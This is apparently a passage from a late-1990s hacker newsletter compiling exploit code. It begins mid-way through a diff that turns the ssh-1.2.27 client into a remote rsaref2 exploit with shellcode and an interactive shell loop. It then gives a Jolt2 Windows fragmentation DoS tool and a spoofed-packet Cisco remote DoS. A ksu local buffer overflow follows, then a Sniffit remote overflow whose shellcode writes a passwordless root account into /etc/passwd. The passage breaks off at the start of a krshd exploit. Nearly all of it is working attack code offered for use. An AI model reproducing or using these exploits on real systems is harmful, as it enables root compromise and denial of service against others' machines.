+ 0xcd, 0x80, 0x6a, 0x00, 0x8d, 0x46, 0x08, 0x50,
+ 0x8b, 0x46, 0x08, 0x50, 0xb8, 0x3b, 0x00, 0x00,
+ 0x00, 0x31, 0xc9, 0x41, 0x51, 0xcd, 0x80, 0xe8,
+ 0xb6, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e,
+ 0x2f, 0x73, 0x68, 0x00};
+ #endif
/* Random number generator state. This is initialized in ssh_login, and
left initialized. This is used both by the packet module and by various
***************
*** 275,280 ****
--- 307,322 ----
/* Prints a help message to the user. This function never returns. */
void usage(void)
{
+ #ifdef SSH_EXPLOIT
+ fprintf(stderr, "ssh/rsaref2 exploit by Core SDI SA (c) 1999\n");
+ fprintf(stderr, "Usage:\n\t%s [-f offset_from] [-t offset_to] -o ostype host\n",av0);
+ fprintf(stderr, "where:\n");
+ fprintf(stderr, "\toffset_from: start offset for brute force\n");
+ fprintf(stderr, "\toffset_to: end offset for brute force\n");
+ fprintf(stderr, "\tostype: remote machine ostype\n");
+ fprintf(stderr, " BSD : for (*BSD)\n");
+ fprintf(stderr, " Linux : for Intel Linuxes\n\n");
+ #else
fprintf(stderr, "Usage: %s [options] host [command]\n", av0);
fprintf(stderr, "Options:\n");
fprintf(stderr, " -l user Log in using this user name.\n");
***************
*** 321,326 ****
--- 363,369 ----
fprintf(stderr, " -C Enable compression.\n");
fprintf(stderr, " -g Allow remote hosts to connect to local port forwardings\n");
fprintf(stderr, " -o 'option' Process the option as if it was read from a configuration file.\n");
+ #endif
exit(1);
}
***************
*** 504,510 ****
--- 547,557 ----
opt = av[optind][1];
if (!opt)
usage();
+ #ifdef SSH_EXPLOIT
+ if (strchr("fto", opt)) /* options with arguments */
+ #else
if (strchr("eilcpLRo", opt)) /* options with arguments */
+ #endif
{
optarg = av[optind] + 2;
if (strcmp(optarg, "") == 0)
***************
*** 522,527 ****
--- 569,594 ----
}
switch (opt)
{
+ #ifdef SSH_EXPLOIT
+ case 'f':
+ exp_offset = strtoul(optarg,NULL,16);
+ break;
+ case 't':
+ exp_offset_to = strtoul(optarg,NULL,16);
+ break;
+ case 'o':
+ if ( !strcmp(optarg,"BSD") ) {
+ shell_code = bsd_shell_code;
+ shell_code_len = sizeof(bsd_shell_code);
+ }
+ else if ( !strcmp(optarg,"Linux") ) {
+ shell_code = linux_shell_code;
+ shell_code_len = sizeof(linux_shell_code);
+ }
+ else
+ usage();
+ break;
+ #else
case 'n':
stdin_null_flag = 1;
break;
***************
*** 681,692 ****
case 'g':
options.gateway_ports = 1;
break;
!
default:
usage();
}
}
!
/* Check that we got a host name. */
if (!host)
usage();
--- 748,766 ----
case 'g':
options.gateway_ports = 1;
break;
! #endif
default:
usage();
}
}
! #ifdef SSH_EXPLOIT
! if ( shell_code == NULL )
! usage();
! if ( exp_offset_to < exp_offset ) {
! fprintf(stderr,"Invalid offsets!\n");
! usage();
! }
! #endif
/* Check that we got a host name. */
if (!host)
usage();
***************
*** 793,798 ****
--- 867,876 ----
rhosts_authentication is true. Note that the random_state is not
yet used by this call, although a pointer to it is stored, and thus it
need not be initialized. */
+ #ifdef SSH_EXPLOIT
+ do
+ {
+ #endif
ok = ssh_connect(host, options.port, options.connection_attempts,
!use_privileged_port,
original_real_uid, options.proxy_command, &random_state);
***************
*** 846,857 ****
original_real_uid);
options.user_hostfile = tilde_expand_filename(options.user_hostfile,
original_real_uid);
!
/* Log into the remote system. This never returns if the login fails.
Note: this initializes the random state, and leaves it initialized. */
ssh_login(&random_state, host_private_key_loaded, &host_private_key,
host, &options, original_real_uid);
!
/* We no longer need the host private key. Clear it now. */
if (host_private_key_loaded)
rsa_clear_private_key(&host_private_key);
--- 924,941 ----
original_real_uid);
options.user_hostfile = tilde_expand_filename(options.user_hostfile,
original_real_uid);
! #ifdef SSH_EXPLOIT
! fprintf(stdout,"Tryin'... 0x%x\n",exp_offset);
! #endif
/* Log into the remote system. This never returns if the login fails.
Note: this initializes the random state, and leaves it initialized. */
ssh_login(&random_state, host_private_key_loaded, &host_private_key,
host, &options, original_real_uid);
! #ifdef SSH_EXPLOIT
! exp_offset++;
! } while (exp_offset<=exp_offset_to);
! fprintf(stderr,"Didn't work ;( \n");
! #endif
/* We no longer need the host private key. Clear it now. */
if (host_private_key_loaded)
rsa_clear_private_key(&host_private_key);
diff -N -c ssh-1.2.27/sshconnect.c ssh-1.2.27-exploit/sshconnect.c
*** ssh-1.2.27/sshconnect.c Wed May 12 08:19:29 1999
--- ssh-1.2.27-exploit/sshconnect.c Thu Dec 9 17:09:39 1999
***************
*** 214,220 ****
#include "mpaux.h"
#include "userfile.h"
#include "emulate.h"
-
#ifdef KERBEROS
#ifdef KRB5
#include <krb5.h>
--- 214,219 ----
***************
*** 1271,1276 ****
--- 1270,1280 ----
const char *orighost,
Options *options, uid_t original_real_uid)
{
+ #ifdef SSH_EXPLOIT
+ extern unsigned long exp_offset;
+ extern unsigned char *shell_code;
+ extern unsigned long shell_code_len;
+ #endif
int i, type, len, f;
char buf[1024], seedbuf[16];
char *password;
***************
*** 1278,1283 ****
--- 1282,1298 ----
MP_INT key;
RSAPublicKey host_key;
RSAPublicKey public_key;
+ #ifdef SSH_EXPLOIT
+ MP_INT fakekey;
+ int retval;
+ unsigned char first;
+ struct sockaddr_in sin;
+ int sin_len=sizeof(struct sockaddr_in);
+ RSAPrivateKey myfakeKey;
+ RSAPrivateKey myPrivateKey;
+ char private_key_filename[]="exploit_key";
+ fd_set rfds;
+ #endif
unsigned char session_key[SSH_SESSION_KEY_LENGTH];
const char *server_user, *local_user;
char *cp, *host;
***************
*** 1501,1506 ****
--- 1516,1522 ----
/* Generate an encryption key for the session. The key is a 256 bit
random number, interpreted as a 32-byte key, with the least significant
8 bits being the first byte of the key. */
+
for (i = 0; i < SSH_SESSION_KEY_LENGTH; i++)
session_key[i] = random_get_byte(state);
***************
*** 1519,1532 ****
else
mpz_add_ui(&key, &key, session_key[i]);
}
!
/* Encrypt the integer using the public key and host key of the server
(key with smaller modulus first). */
if (mpz_cmp(&public_key.n, &host_key.n) < 0)
{
/* Public key has smaller modulus. */
assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED);
-
rsa_public_encrypt(&key, &key, &public_key, state);
rsa_public_encrypt(&key, &key, &host_key, state);
}
--- 1535,1552 ----
else
mpz_add_ui(&key, &key, session_key[i]);
}
! #ifdef SSH_EXPLOIT
! if ( load_private_key(getuid(),private_key_filename,"",&myPrivateKey,NULL)==0) {
! fprintf(stderr,"Cannot locate private key %s\n",private_key_filename);
! exit(1);
! }
! #endif
/* Encrypt the integer using the public key and host key of the server
(key with smaller modulus first). */
if (mpz_cmp(&public_key.n, &host_key.n) < 0)
{
/* Public key has smaller modulus. */
assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED);
rsa_public_encrypt(&key, &key, &public_key, state);
rsa_public_encrypt(&key, &key, &host_key, state);
}
***************
*** 1534,1540 ****
{
/* Host key has smaller modulus (or they are equal). */
assert(public_key.bits >= host_key.bits + SSH_KEY_BITS_RESERVED);
-
rsa_public_encrypt(&key, &key, &host_key, state);
rsa_public_encrypt(&key, &key, &public_key, state);
}
--- 1554,1559 ----
***************
*** 1564,1569 ****
--- 1583,1637 ----
for (i = 0; i < 8; i++)
packet_put_char(check_bytes[i]);
+ #ifdef SSH_EXPLOIT
+ for ( i = 0 ; i < 16; i++ ) {
+ mpz_mul_2exp(&key, &key, 8);
+ mpz_add_ui(&key, &key, i+1);
+ }
+ /* Aca seto el lugar donde va a estar la clave nueva cambiada*/
+ for ( i = 0; i < 4 ; i++ ) {
+ mpz_mul_2exp(&key,&key,8);
+ mpz_add_ui(&key,&key, ((exp_offset+9) >> (i*8) & 0xff));
+ }
+
+ /* Con esto fuerzo a que el ciphertext sea mas chico que el modulo*/
+ key._mp_d[31]=0;
+ key._mp_d[32]=0;
+ key._mp_d[3]=htonl(exp_offset+0x5b);
+ /* Ret address a mi codigo */
+ //key._mp_d[3]=0x51510808; // JUMP_TO_MY_KEY+87 dado vuelta
+ /*
+ No se porque mierda ahora hay que invertilo...
+ key._mp_d[3]=JUMP_TO_MY_KEY+80;
+ */
+
+ myfakeKey.bits = 1182; /* Tamanio de la clave */
+ myfakeKey.n._mp_alloc = 33;
+ myfakeKey.n._mp_size = 32;
+ myfakeKey.n._mp_d = (unsigned long int *)(exp_offset+184);
+
+ myfakeKey.e._mp_alloc = 1;
+ myfakeKey.e._mp_size = 1;
+ myfakeKey.e._mp_d = (unsigned long int *)(exp_offset+316);
+
+ myfakeKey.d._mp_alloc = 1;
+ myfakeKey.d._mp_size = 1;
+ myfakeKey.d._mp_d = (unsigned long int *)(exp_offset+25);
+
+ myfakeKey.u._mp_alloc = 17;
+ myfakeKey.u._mp_size = 16;
+ myfakeKey.u._mp_d = (unsigned long int *)(exp_offset+460);
+
+ myfakeKey.p._mp_alloc = 17;
+ myfakeKey.p._mp_size = 16;
+ myfakeKey.p._mp_d = (unsigned long int *)(exp_offset+392);
+
+ myfakeKey.q._mp_alloc = 17;
+ myfakeKey.q._mp_size = 16;
+ myfakeKey.q._mp_d = (unsigned long int *)(exp_offset+324);
+
+ #endif
+
/* Send the encrypted encryption key. */
packet_put_mp_int(&key);
***************
*** 1571,1579 ****
--- 1639,1686 ----
packet_put_int(SSH_PROTOFLAG_SCREEN_NUMBER | SSH_PROTOFLAG_HOST_IN_FWD_OPEN);
/* Send the packet now. */
+ #ifdef SSH_EXPLOIT
+ packet_put_string("BETO",4);
+ packet_put_string((char *)&myfakeKey,sizeof(myfakeKey));
+ packet_put_string(shell_code, shell_code_len);
+ packet_put_string((char *)myPrivateKey.n._mp_d,myPrivateKey.n._mp_size*4);
+ packet_put_string((char *)myPrivateKey.e._mp_d,myPrivateKey.e._mp_size*4);
+ packet_put_string((char *)myPrivateKey.q._mp_d,myPrivateKey.q._mp_size*4);
+ packet_put_string((char *)myPrivateKey.p._mp_d,myPrivateKey.p._mp_size*4);
+ packet_put_string((char *)myPrivateKey.u._mp_d,myPrivateKey.u._mp_size*4);
+ #endif
packet_send();
packet_write_wait();
+ #ifdef SSH_EXPLOIT
+ usleep(10);
+ first = 1;
+ i = write(packet_get_connection_in(),"id\n",3);
+ if ( getpeername(packet_get_connection_in(),(struct sockaddr *)&sin, &sin_len) == -1)
+ return;
+
+ while (1) {
+ FD_ZERO(&rfds);
+ FD_SET(packet_get_connection_in(),&rfds);
+ FD_SET(STDIN_FILENO,&rfds);
+ if ( (retval = select(packet_get_connection_in()+1,&rfds,NULL,NULL,NULL)) < 0 )
+ return;
+ if (FD_ISSET(STDIN_FILENO,&rfds)) {
+ i=read(STDIN_FILENO,buf,sizeof(buf));
+ write(packet_get_connection_out(),buf,i);
+ } else if (FD_ISSET(packet_get_connection_in(),&rfds)) {
+ i=read(packet_get_connection_in(),buf,sizeof(buf));
+ if ( first )
+ if ( strncmp(buf,"uid",3) )
+ return;
+ else {
+ fprintf(stdout,"Got it!\n");
+ first = 0;
+ }
+ write(STDOUT_FILENO,buf,i);
+ }
+ }
+ #endif
/* Destroy the session key integer and the public keys since we no longer
need them. */
mpz_clear(&key);
***************
*** 1583,1588 ****
--- 1690,1697 ----
debug("Sent encrypted session key.");
/* Set the encryption key. */
+ packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH+120,
+ options->cipher, 1);
packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH,
options->cipher, 1);
Common subdirectories: ssh-1.2.27/zlib-1.0.4 and ssh-1.2.27-exploit/zlib-1.0.4
@HWA
240.0 [IND] '0-day' jolt2.c poc code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WinSec mailing list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Here is some proof of concept code for the Jolt2 DoS reported by
BindView Razor Team (http://razor.bindview.com). Note, this code was
not created by me, I am simply passing it on to the mailing list.
Send all questions/problems to the author of the code,
phonix@moocow.org
Regards;
Steve Manzuik
Moderator
- --------------snip----------------
/*
* File: jolt2.c
* Author: Phonix <phonix@moocow.org>
* Date: 23-May-00
*
* Description: This is the proof-of-concept code for the
* Windows denial-of-serice attack described by
* the Razor team (NTBugtraq, 19-May-00)
* (MS00-029). This code causes cpu utilization
* to go to 100%.
*
* Tested against: Win98; NT4/SP5,6; Win2K
*
* Written for: My Linux box. YMMV. Deal with it.
*
* Thanks: This is standard code. Ripped from lots of places.
* Insert your name here if you think you wrote some of
* it. It's a trivial exploit, so I won't take credit
* for anything except putting this file together.
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <getopt.h>
struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data;
} pkt;
int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck;
void usage(char *pname)
{
fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
pname);
fprintf (stderr, "Note: UDP used if a port is specified, otherwise
ICMP\n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
int bs, psize;
unsigned long x;
struct sockaddr_in to;
to.sin_family = AF_INET;
to.sin_port = 1235;
to.sin_addr.s_addr = dst_addr;
if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1;
memset(&pkt, 0, psize);
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(iplen + icmplen) + 40;
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons (8190);
if (port)
{
pkt.proto.udp.source = htons(port|1235);
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9);
pkt.data = 'a';
} else {
pkt.proto.icmp.type = ICMP_ECHO;
pkt.proto.icmp.code = 0;
pkt.proto.icmp.checksum = 0;
}
while (1) {
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
}
return bs;
}
int main(int argc, char *argv[])
{
u_long src_addr, dst_addr;
int i, bs=1, port=0;
char hostname[32];
if (argc < 2)
usage (argv[0]);
gethostname (hostname, 32);
src_addr = host_to_ip(hostname);
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's':
dst_addr = host_to_ip(optarg);
if (!dst_addr)
quit("Bad source address given.");
break;
case 'p':
port = atoi(optarg);
if ((port <=0) || (port > 65535))
quit ("Invalid port number given.");
break;
case 'h':
default:
usage (argv[0]);
}
}
dst_addr = host_to_ip(argv[argc-1]);
if (!dst_addr)
quit("Bad destination address given.");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
do_frags (spf_sck, src_addr, dst_addr, port);
}
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek
IAkI+Hv0ul66TxRmIJP1LqRH
=sSSM
-----END PGP SIGNATURE-----
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
241.0 [IND] cisco remote dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#include <netdb.h>
unsigned short compute_tcp_checksum(struct tcphdr *th, int len,
unsigned long saddr, unsigned long daddr)
{
unsigned long sum;
__asm__("
addl %%ecx, %%ebx
adcl %%edx, %%ebx
adcl $0, %%ebx
"
: "=b"(sum)
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
: "bx", "cx", "dx" );
__asm__("
movl %%ecx, %%edx
cld
cmpl $32, %%ecx
jb 2f
shrl $5, %%ecx
clc
1: lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
loop 1b
adcl $0, %%ebx
movl %%edx, %%ecx
2: andl $28, %%ecx
je 4f
shrl $2, %%ecx
clc
3: lodsl
adcl %%eax, %%ebx
loop 3b
adcl $0, %%ebx
4: movl $0, %%eax
testw $2, %%dx
je 5f
lodsw
addl %%eax, %%ebx
adcl $0, %%ebx
movw $0, %%ax
5: test $1, %%edx
je 6f
lodsb
addl %%eax, %%ebx
adcl $0, %%ebx
6: movl %%ebx, %%eax
shrl $16, %%eax
addw %%ax, %%bx
adcw $0, %%bx
"
: "=b"(sum)
: "0"(sum), "c"(len), "S"(th)
: "ax", "bx", "cx", "dx", "si" );
return((~sum) & 0xffff);
}
#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) )
#define tcp_offset ( sizeof(struct iphdr) )
#define err(x) { fprintf(stderr, x); exit(1); }
#define errors(x, y) { fprintf(stderr, x, y); exit(1); }
struct iphdr temp_ip;
int temp_socket = 0;
u_short
ip_checksum (u_short * buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void
fixhost (struct sockaddr_in *addr, char *hostname)
{
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *) addr;
(void) bzero ((char *) address, sizeof (struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_addr.s_addr = inet_addr (hostname);
if ((int) address->sin_addr.s_addr == -1)
{
host = gethostbyname (hostname);
if (host)
{
bcopy (host->h_addr, (char *) &address->sin_addr,
host->h_length);
}
else
{
puts ("Couldn't resolve address!!!");
exit (-1);
}
}
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
unsigned short
lookup_port (p)
char *p;
{
int i;
struct servent *s;
if ((i = atoi (p)) == 0)
{
if ((s = getservbyname (p, "tcp")) == NULL)
errors ("Unknown port %s\n", p);
i = ntohs (s->s_port);
}
return ((unsigned short) i);
}
void
spoof_packet (struct sockaddr_in local, int fromport, \
struct sockaddr_in remote, int toport, ulong sequence, \
int sock, u_char theflag, ulong acknum, \
char *packdata, int datalen)
{
char *packet;
int tempint;
if (datalen > 0)
datalen++;
packet = (char *) malloc (psize + datalen);
tempint = toport;
toport = fromport;
fromport = tempint;
{
struct tcphdr *fake_tcp;
fake_tcp = (struct tcphdr *) (packet + tcp_offset);
fake_tcp->th_dport = htons (fromport);
fake_tcp->th_sport = htons (toport);
fake_tcp->th_flags = theflag;
fake_tcp->th_seq = random ();
fake_tcp->th_ack = random ();
/* this is what really matters, however i randomize everything else
to prevent simple rule based filters */
fake_tcp->th_off = random ();
fake_tcp->th_win = random ();
fake_tcp->th_urp = random ();
}
if (datalen > 0)
{
char *tempbuf;
tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
for (tempint = 0; tempint < datalen - 1; tempint++)
{
*tempbuf = *packdata;
*tempbuf++;
*packdata++;
}
*tempbuf = '\r';
}
{
struct iphdr *real_ip;
real_ip = (struct iphdr *) packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons (psize + datalen);
real_ip->tos = 0;
real_ip->ttl = 64;
real_ip->protocol = 6;
real_ip->check = 0;
real_ip->id = 10786;
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
temp_ip.saddr = htonl (ntohl (real_ip->daddr));
real_ip->daddr = htonl (ntohl (real_ip->saddr));
real_ip->saddr = temp_ip.saddr;
real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
{
struct tcphdr *another_tcp;
another_tcp = (struct tcphdr *) (packet + tcp_offset);
another_tcp->th_sum = 0;
another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,
real_ip->saddr, real_ip->daddr);
}
}
{
int result;
sock = (int) temp_socket;
result = sendto (sock, packet, psize + datalen, 0,
(struct sockaddr *) &remote, sizeof (remote));
}
free (packet);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int daddr;
unsigned short dport;
struct sockaddr_in sin;
int s, i;
struct sockaddr_in local, remote;
u_long start_seq = 4935835 + getpid ();
if (argc != 3)
errors ("Usage: %s <dest_addr> <dest_port>\n\nDest port of 23n",
argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(daddr = lookup (argv[1])))
err ("Unable to lookup destination address.\n");
dport = lookup_port (argv[2]);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = daddr;
sin.sin_port = dport;
fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]);
fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]);
/* 500 seems to be enough to kill it */
for (i = 0; i < 500; i++)
{
start_seq++;
local.sin_addr.s_addr = random ();
spoof_packet (local, random (), remote, dport, start_seq, (int) s,
TH_SYN | TH_RST | TH_ACK, 0, NULL, 0);
}
}
/* www.hack.co.za [22 May]*/
@HWA
242.0 [IND] linux local misc overflow by jim paris.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
jim@jtan.com
/********
* ksux.c -- ksu exploit
* written January 26, 2000
* Jim Paris <jim@jtan.com>
*
* This program exploits a vulnerability in the 'ksu' utility included
* with the MIT Kerberos distribution. Versions prior to 1.1.1 are
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0. Exploits
* for other operating systems and versions of Kerberos should also work.
*
* Since krb5_parse_name will reject input with an @ or /, this shellcode
* execs 'sh' instead of '/bin/sh'. As a result, a copy of 'sh' must
* reside in the current directory for the exploit to work.
*
*/
#include <stdlib.h>
#include <stdio.h>
int get_esp(void) { __asm__("movl %esp,%eax"); }
char *shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x02\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xffsh";
#define LEN 0x300
#define RET_OFFSET 0x240
#define JMP_OFFSET 0x240
#define CODE_OFFSET 0x100
int main(int argc, char *argv[])
{
int esp=get_esp();
int i,j; char b[LEN];
memset(b,0x90,LEN);
memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode));
*(int *)&b[RET_OFFSET]=esp+JMP_OFFSET;
b[RET_OFFSET+4]=0;
execlp("ksu","ksu","-n",b,NULL);
}
/* www.hack.co.za [22 May]*/
@HWA
243.0 [IND] linux remote misc overflow by noir.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
noir@gsu.linux.org.tr
/*
Sniffit 0.3.7Beta Remote Exploit
sniffit has to be running (-L mail) flag set for this to work.
bug discovery by http://www.s0ftpj.org
tested on RedHat 6.0
this will get you a root line in /etc/passwd
-->snip...
# tail -1 /etc/passwd
n0ir::0:0:mr. noir:/:/bin/sh
<--end...
greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux
exploit code by noir@gsu.linux.org.tr | noir@olympos.org
http://www.olympos.org
[RET]{NOP}[shellcode]
3 May 2000
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
unsigned char shellcode[]= {
0xeb, 0x03, 0x5f, 0xeb, 0x05, 0xe8, 0xf8, 0xff,
0xff, 0xff, 0x31, 0xdb, 0xb3, 0x35, 0x01, 0xfb,
0x30, 0xe4, 0x88, 0x63, 0x0b, 0x31, 0xc9, 0x66,
0xb9, 0x01, 0x04, 0x31, 0xd2, 0x66, 0xba, 0xa4,
0x01, 0x31, 0xc0, 0xb0, 0x05, 0xcd, 0x80, 0x89,
0xc3, 0x31, 0xc9, 0xb1, 0x5b, 0x01, 0xf9, 0x31,
0xd2, 0xb2, 0x1d, 0x31, 0xc0, 0xb0, 0x04, 0xcd,
0x80, 0x31, 0xc0, 0xb0, 0x01, 0xcd, 0x80, 0x2f,
0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73,
0x77, 0x64, 0x01, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x6e, 0x30, 0x69, 0x72, 0x3a,
0x3a, 0x30, 0x3a, 0x30, 0x3a, 0x6d, 0x72, 0x2e,
0x20, 0x6e, 0x6f, 0x69, 0x72, 0x3a, 0x2f, 0x3a,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20
};
int resolv(char *hname, struct in_addr *addr);
/*#define RET 0xaabbccdd marker lvalue*/
#define RET 0xbfff5ba3 /*RedHat 6.0 (hedwig)*/
#define NOP 0x90
int
main(int argc, char *argv[])
{
int fd;
int i, l;
int align = 11;
unsigned long eip = RET, addr = 0, offset = 0;
unsigned char ovf[812];
struct sockaddr_in servaddr;
if (argc < 2){
fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
fprintf(stderr,"Olympos Security Team http://www.olympos.org\n");
fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n");
fprintf(stderr,"\nUsage: %s <serv> [offset]\n\n",argv[0]);
exit(0);
}
if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
perror("socket");
exit(-1);
}
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(25);
if(!resolv(argv[1], &servaddr.sin_addr)){
herror("gethostbyname");
exit(-1);
}
if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
perror("connect");
exit(-1);
}
printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
printf("Olympos Security Team http://www.olympos.org\n");
printf("bug discovery by FuSyS of s0ftpj.org\n");
if(argv[2])
offset = atoi(argv[2]);
addr = eip + offset;
memset(ovf, NOP, sizeof(ovf));
for( i = 0 ; i < align; i++) ovf[i] = 0x41;
for( i = align; i < strlen(ovf) ; i+=4)
*((long *) &ovf[i]) = addr;
for( i = 230; i < strlen(ovf); i++) ovf[i] = 0x90;
for( i = 603, l = 0; l < strlen(shellcode); i++, l++)
ovf[i] = shellcode[l];
printf("eip: 0x%lx\n", addr);
memcpy(ovf, "mail from:",10);
write(fd, ovf, strlen(ovf));
write(fd, "\r\n\n", 3);
return 0;
}
int
resolv(char *hname, struct in_addr *addr)
{
struct hostent *hp;
if(inet_aton(hname, addr))
return 1;
if ( (hp = gethostbyname(hname)) == NULL)
return 0;
memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr));
return 1;
}
/* www.hack.co.za [22 May]*/
@HWA
244.0 [IND] linux remote misc overflow by jim paris.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
jim@jtan.com
/********
* kshux.c -- krshd remote exploit
* written April 8, 2000
* Jim Paris <jim@jtan.com>
*
* This program exploits a vulnerability in the 'krshd' daemon included
* with the MIT Kerberos distribution. All versions are apparently
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0, but you'll
* probably need a fair bit of coaxing to get it to work.
*
* And yes, it's ugly. I need to accept an incoming connection from the
* remote server, handle the fact that the overflow goes through two
* functions and a toupper(), make sure that certain overwritten pointers
* on the remote host's stack are set to valid values so that a strlen
* call in krb425_conv_principal() doesn't cause a segfault before we
* return into the shellcode, adjust the offset depending on the remote
* hostname to properly align things, etc etc. As a result, you'll
* probably have a hard time getting this to work -- it took a lot of
* hacking and hardcoded numbers to get this to work against my test
* systems.
*
*/
#include <stdio.h>
